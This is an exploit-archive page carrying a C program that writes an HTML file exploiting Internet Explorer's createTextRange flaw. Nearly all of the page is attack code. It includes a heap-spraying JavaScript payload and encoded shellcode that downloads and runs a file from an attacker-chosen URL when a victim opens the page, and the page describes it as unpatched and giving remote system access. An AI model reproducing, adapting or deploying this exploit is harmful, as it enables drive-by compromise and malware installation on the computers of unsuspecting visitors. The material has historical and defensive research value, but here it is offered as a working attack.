what you don't know can hurt you

msie-createTextRang-2.c

msie-createTextRang-2.c
Posted Apr 1, 2006
Authored by ATmaCA | Site spyinstructors.com

Microsoft Internet Explorer createTextRang download shellcoded exploit. Second version.

tags | exploit, shellcode
MD5 | 92cc6b9991f51241d8147d69aca202db

msie-createTextRang-2.c

Change Mirror Download
/*
*
* Internet Explorer "createTextRang" Download Shellcoded Exploit (2)
* Bug discovered by Computer Terrorism (UK)
* http://www.computerterrorism.com/research/ct22-03-2006
*
* Affected Software: Microsoft Internet Explorer 6.x & 7 Beta 2
* Severity: Critical
* Impact: Remote System Access
* Solution Status: Unpatched
*
* E-Mail: atmaca@icqmail.com
* Web: http://www.spyinstructors.com,http://www.atmacasoft.com
* Credit to Kozan,SkyLined,delikon,Darkeagle,Stelian Ene
*
*/

/*
*
* This one is more faster than all released createTextRange exploits
* because it uses last version of SkyLined's heap spraying code,
* special 10x goes to him.
*
*/

#include <windows.h>
#include <stdio.h>

#define BUF_LEN 0x800
#define FILE_NAME "index.htm"

char body1[] =
"<input type=\"checkbox\" id=\"blah\">\r\n"
"<SCRIPT language=\"javascript\">\r\n\r\n"
"\tvar heapSprayToAddress = 0x3c0974c2;\r\n\r\n"
"\tvar payLoadCode = unescape(\"%u9090%u9090%u9090\" +\r\n"
"\t\"%uCCE9%u0000%u5F00%u56E8%u0000%u8900%u50C3%u8E68%u0E4E%uE8EC\" +\r\n"
"\t\"%u0060%u0000%uC931%uB966%u6E6F%u6851%u7275%u6D6C%uFF54%u50D0\" +\r\n"
"\t\"%u3668%u2F1A%uE870%u0046%u0000%uC931%u5151%u378D%u8D56%u0877\" +\r\n"
"\t\"%u5156%uD0FF%u6853%uFE98%u0E8A%u2DE8%u0000%u5100%uFF57%u31D0\" +\r\n"
"\t\"%u49C9%u9090%u6853%uD87E%u73E2%u19E8%u0000%uFF00%u55D0%u6456\" +\r\n"
"\t\"%u30A1%u0000%u8B00%u0C40%u708B%uAD1C%u688B%u8908%u5EE8%uC35D\" +\r\n"
"\t\"%u5553%u5756%u6C8B%u1824%u458B%u8B3C%u0554%u0178%u8BEA%u184A\" +\r\n"
"\t\"%u5A8B%u0120%uE3EB%u4935%u348B%u018B%u31EE%uFCFF%uC031%u38AC\" +\r\n"
"\t\"%u74E0%uC107%u0DCF%uC701%uF2EB%u7C3B%u1424%uE175%u5A8B%u0124\" +\r\n"
"\t\"%u66EB%u0C8B%u8B4B%u1C5A%uEB01%u048B%u018B%uE9E8%u0002%u0000\" +\r\n"
"\t\"%uC031%uEA89%u5E5F%u5B5D%uE8C3%uFF2F%uFFFF%u686D%u2E68%u7865\" +\r\n"
"\t\"%u0065";

char body2[] =
"\r\n\r\n\tvar heapBlockSize = 0x400000;\r\n\r\n"
"\tvar payLoadSize = payLoadCode.length * 2;\r\n\r\n"
"\tvar spraySlideSize = heapBlockSize - (payLoadSize+0x38);\r\n\r\n"
"\tvar spraySlide = unescape(\"%u9090%u9090\");\r\n"
"\tspraySlide = getSpraySlide(spraySlide,spraySlideSize);\r\n\r\n"
"\theapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;\r\n\r\n"
"\tmemory = new Array();\r\n\r\n"
"\tfor (i=0;i<heapBlocks;i++)\r\n"
"\t{\r\n\t\tmemory[i] = spraySlide + payLoadCode;\r\n\t}\r\n\r\n"
"\tvar r = document.getElementById('blah').createTextRange();\r\n\r\n"
"\tfunction getSpraySlide(spraySlide, spraySlideSize)\r\n"
"\t{\r\n\t\twhile (spraySlide.length*2<spraySlideSize)\r\n\t\t{\r\n"
"\t\t\tspraySlide += spraySlide;\r\n\t\t}\r\n"
"\t\tspraySlide = spraySlide.substring(0,spraySlideSize/2);\r\n"
"\t\treturn spraySlide;\r\n"
"\t}\r\n\r\n</script>";


int main(int argc,char *argv[])
{
if (argc < 2)
{
printf("\nInternet Explorer \"createTextRang\" Download Shellcoded Exploit (2)");
printf("\nCoded by ATmaCA (atmaca[at]icqmail.com)\n");
printf("\nUsage:\n");
printf("ie_exp <WebUrl>\n");

return 0;
}

FILE *File;
char *pszBuffer;
char *web = argv[1];
char *pu = "%u";
char u_t[5];
char *utf16 = (char*)malloc(strlen(web)*5);

if ( (File = fopen(FILE_NAME,"w+b")) == NULL ) {
printf("\n [Err:] fopen()");
exit(1);
}

pszBuffer = (char*)malloc(BUF_LEN);
memcpy(pszBuffer,body1,sizeof(body1)-1);

memset(utf16,'\0',strlen(web)*5);
for (unsigned int i=0;i<strlen(web);i=i+2)
{
sprintf(u_t,"%s%.2x%.2x", pu, web[i+1], web[i]);
strcat(utf16,u_t);
}

strcat(pszBuffer,utf16);
strcat(pszBuffer,"%u0000\");");
strcat(pszBuffer,body2);

fwrite(pszBuffer, BUF_LEN, 1,File);
fclose(File);

printf("\n\n" FILE_NAME " has been created in the current directory.\n");
return 1;
}
Login or Register to add favorites

File Archive:

May 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    14 Files
  • 2
    May 2nd
    3 Files
  • 3
    May 3rd
    1 Files
  • 4
    May 4th
    18 Files
  • 5
    May 5th
    15 Files
  • 6
    May 6th
    21 Files
  • 7
    May 7th
    15 Files
  • 8
    May 8th
    19 Files
  • 9
    May 9th
    1 Files
  • 10
    May 10th
    2 Files
  • 11
    May 11th
    18 Files
  • 12
    May 12th
    39 Files
  • 13
    May 13th
    15 Files
  • 14
    May 14th
    17 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    2 Files
  • 17
    May 17th
    2 Files
  • 18
    May 18th
    15 Files
  • 19
    May 19th
    21 Files
  • 20
    May 20th
    15 Files
  • 21
    May 21st
    15 Files
  • 22
    May 22nd
    6 Files
  • 23
    May 23rd
    1 Files
  • 24
    May 24th
    1 Files
  • 25
    May 25th
    2 Files
  • 26
    May 26th
    23 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close